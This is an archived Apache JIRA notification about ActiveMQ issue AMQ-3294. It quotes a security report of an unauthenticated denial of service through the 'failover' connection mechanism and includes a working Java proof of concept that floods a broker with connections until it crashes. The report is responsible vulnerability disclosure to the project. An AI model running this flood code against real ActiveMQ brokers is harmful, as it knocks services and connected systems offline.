You are viewing a plain text version of this content. The canonical link for it is here.
Posted to dev@activemq.apache.org by "Luca Carettoni (JIRA)" <ji...@apache.org> on 2011/08/30 18:41:37 UTC

[jira] [Commented] (AMQ-3294) ActiveMQ failover Denial of Service

    [ https://issues.apache.org/jira/browse/AMQ-3294?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13093877#comment-13093877 ] 

Luca Carettoni commented on AMQ-3294:
-------------------------------------

After a few months, any update on this?

Thanks,
Luca

> ActiveMQ failover Denial of Service
> -----------------------------------
>
>                 Key: AMQ-3294
>                 URL: https://issues.apache.org/jira/browse/AMQ-3294
>             Project: ActiveMQ
>          Issue Type: Bug
>          Components: Broker
>    Affects Versions: 5.2.0, 5.5.0
>         Environment: Linux ubuntu 2.6.32-30-generic and other Linux versions
>            Reporter: Luca Carettoni
>              Labels: security
>
> Abusing the 'failover' feature in ActiveMQ, an unauthenticated user can trigger a Denial of Service condition against the broker service. 
> In detail, an attacker can issue multiple ActiveMQ openwire connection requests using the following connection string: 
failover:tcp://<IP>:61616
> Due to the 'failure' mechanism, all TCP connections remain active even if a valid session is not created. 
> Please note that no valid credentials have been used. 
> After a few thousand requests, a "java.net.SocketException: Too many open files" exception is triggered causing the freeze/crash of the broker. Connected systems may crash as well. 
> During my test, the attack took around 4 minutes (in a local network) and it is highly reliable. This is most likely an abuse of the 'failover' functionality.
> I've been testing version 5.2.0 and also the latest 5.5.0 release. As both releases are affected, I assume that this issue is present in other versions as well. The problem appears in the default configuration as well as with different authentication plugins enabled.
> Proof-Of-Concept:
> --------------------
> package openwireclient;
> import javax.jms.*;
> import org.apache.activemq.ActiveMQConnectionFactory;
> public class GoAndCrash {
>     private static String url = "failover:tcp://";
>     public static void main(String[] args) throws JMSException {
>         System.out.println("\n--[ ActiveMQ Denial of Service PoC ]\n");
>         url = url.concat(args[0] + ":" + args[1]);
>         int cont = 0;
>         while (true) {
>             try {
>                 System.out.println("[*] Request #" + cont);
>                 ConnectionFactory connectionFactory = new ActiveMQConnectionFactory("invalidUser", "invalidPass", url);
>                 Connection connection = connectionFactory.createConnection();
>                 cont++;
>                 connection.start();
>             } catch (Exception ex) {
>                //do nothing
>             }
>         }
>     }
> }
> --------------------

--
This message is automatically generated by JIRA.
For more information on JIRA, see: http://www.atlassian.com/software/jira